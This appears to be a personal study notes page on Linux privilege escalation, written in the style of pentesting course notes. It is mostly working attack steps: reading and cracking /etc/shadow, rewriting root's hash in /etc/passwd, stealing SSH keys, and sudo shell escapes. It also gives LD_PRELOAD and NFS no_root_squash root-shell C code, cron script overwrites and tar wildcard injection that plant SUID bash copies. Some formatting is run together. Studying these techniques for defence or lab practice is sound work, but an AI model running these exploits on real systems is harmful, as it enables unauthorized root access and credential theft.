😎Linux Privilege Escalation

Manual Enumeration

  1. 1.System Enumeration

  • hostname ⇒ name that identifies a device in a network

  • uname -a ,, cat /etc/issue ,, cat /proc/version => get info about kernal or

  • lscpu => get info about cpu and treads

  • ps aux | grep "root" ⇒ get process run as root perm

  • ps aux | grep “root” =>Enumerating Program Versions

  • dpkg -l | grep <program> => dpkg can show installed programs and their version

  1. 2.User Enumeration

  • whoamiget current user

  • idget user identification in system

  • find / -user usernameget current user permission

  • sudo -l => get what we can run as root without pass

  • cat /etc/passwd

  • cat /etc/shadow

​3- Network Enumeration

  • ifconfig / ip aget information about network

  • cat /etc/resolve.confget information about DNS

  • ip route print routing table

  • arp -a / ip neighget arp cache

  • netstat -anoget listen ports and connected ports

​💡 Port Forwarding From metasploit :

  • portfwd add -l <our_port> -p 80 -r <target_port>

Privilege Escalation :

1- Kernal Exploitaion

  • exec uname -a get the version of kernal || run linux-exploit-suggester script

  • linux-exploit-suggester

  • https://github.com/spencerdodd/kernelpop

  • searchsploit kernel || looking in GHDB or https://github.com/lucyoa/kernel-exploits

2- Password Hunting :

  1. 1.looking for history of user with command : history

  2. 2.run linpeas

💡 3- weak file permission

  • etc/shadow :

  • look for permission if we can read /etc/shadow --> cat file and get hash and run john against root hash

  • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

  • etc/passwd :

    • if we can writable in it we will Generate a new password hash with a password

    • openssl passwd new_password

    • Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x"). --> then switch to root

  • Find all directories which can be written to : find / -executable -writable -type d 2> /dev/null

  • Find all writable files in /etc : find /etc -maxdepth 1 -writable -type f

  • Find all readable files in /etc : find /etc -maxdepth 1 -readable -type f

4- SSH Key

  • look for ssh key :

    • find / -name authorized_keys 2> /dev/null

    • find / -name id_rsa 2> /dev/null

  • if we found SSH KEY Copy the key over to your local machine, and give it permissions (600)

    • chmod 600 root_key

    • grep PermitRootLogin /etc/ssh/sshd_config ⇒ make this step to know if machine allowed root log with ssh or not

    • use it to login to ssh if we allowed that : ssh -i root_key root@192.168.1.25

5- sudo ( shell escape sequences ) : Best one for me

  • regular user can do something as root without password then get privilege

  • sudo -l ⇒ list all things we can do

  • **https://gtfobins.github.io/** go to and look for way to escalate your privilege

🤡 Another Technique :

  • if we have something in sudo escape have a specific Function like apache then we can get root hash with :

    • sudo apache2 -f /etc/shadow

    • extract hashes then use su

💡 6- Environment Variables ( LD_PRELOAD )

  • Programs run through sudo can inherit the environment variables

  • LD Mean Dynamic Linker

  • Trick here we are going to make malicious library run before any other libraries

🤡 steps :

  1. 1.Check for LD_PRELOAD (with the env_keep option)

  2. 2.Write a simple C code compiled as a share object (.so extension) file

  3. 3.Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

**#include <stdio.h>#include <sys/types.h>#include <stdlib.h>​void _init() {unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash");}**

  • save as shell.c

  • Compile code : gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles

  • run the program by specifying the LD_PRELOAD option ⇒ sudo LD_PRELOAD=/tmp/shell.so (any service from sudo -l )

💡 7- SUID ( user + special )

  • SUID always executes as the user who owns the file

    • if root is the owner of simple bash script && regular user has SUID then he can execute script as root (owner)

  • find / -perm -u=s -type f 2>/dev/null

  • go to https://gtfobins.github.io/ and look for exploit

  • may be all of result can’t be vulnerable

8- Capabilities

  • Before capabilities, we only had the binary system of privileged and non-privileged processes to performing permission check ,, such as Root has UID Zero and default user has UID Non Zero

  • **Capabilities : similar to SUID But there is a difference

    • Capabilities : maintained by the kernel are those permissions that divide the privileges of kernel user or kernel level programs into small pieces

    • SUID : Stands for set user ID and allows users to execute the file as the file owner

  • **Find out what capabilities are Enabled : getcap -r / 2>/dev/null

  • search in google with capabilities name to get privilege

9- Cron Jobs

  • Cron jobs are programs or scripts which users can schedule to run at specific times or intervals.

    • Cron jobs run with the security level of the user who owns them

  • it stored in :

    • /etc/crontab The system-wide crontab is located at

    • /var/spool/cron/

    • /var/spool/cron/crontabs/

😃 Overwrite Cron File

  1. 1.View the contents of the system-wide crontab: cat /etc/crontab

  2. 2.let’s say we find that

  3. 3.Locate the location of File : Locate [overwrite.sh](http://overwrite.sh)

  4. 4.show our permission for this file : ls -la

  5. 5.remove the original file and maka a new one with privilege Technique

  6. 6.nano /usr/local/bin/overwrite.sh

#!/bin/bashcp /bin/bash /tmp/bashchmod +xs /tmp/bash

  1. 6.then wait a minute to work and run : /tmp/bash -p

🤡 WildCard Cron jobs :

  • Steps For Detect

  1. 1.cat /etc/crontab

  2. 2.notice the script “/usr/local/bin/compress.sh”

  3. 3.cat /usr/local/bin/compress.sh

  4. 4.notice the wildcard (*) used by ‘tar’.

  • Steps For Exploit :

  1. 1.make this script

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

  1. 1.touch /home/user/--checkpoint=1

  2. 2.touch /home/user/--checkpoint-action=exec=sh\ runme.sh

  3. 3.Wait 1 minute for the Bash script to execute.

  4. 4./tmp/bash -p

  5. 5.type : id

10- NFS (Network File System) : Privilege

  • configured in the /etc/exports

  • Steps For check and attack

  1. 1.we check if it Vulnerable or not when we see “no_root_squash” in output

  2. 2.enumerating mountable shares from our attacking machine. : showmount -e ip

  3. 3.Mount an NFS share which have “no_root_squash” in output ⇒ mount -o rw,vers=2 <target ipt>:/<share folder> <directory in my machine>

  4. 4.then make script .c in my machine and it will change automatic in target machine :

int main(){ setgid(0);​setuid(0);​system("/bin/bash");​return 0;​}

  1. 1.then compile it and make it executable : gcc nfs.c -o nf -w

  2. 2.chmod +s nf

  3. 3.and run it

Some Resources

https://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources​​https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/​​https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

PreviousPrivilege EscalationNextWindows Privilege Escalation

Last updated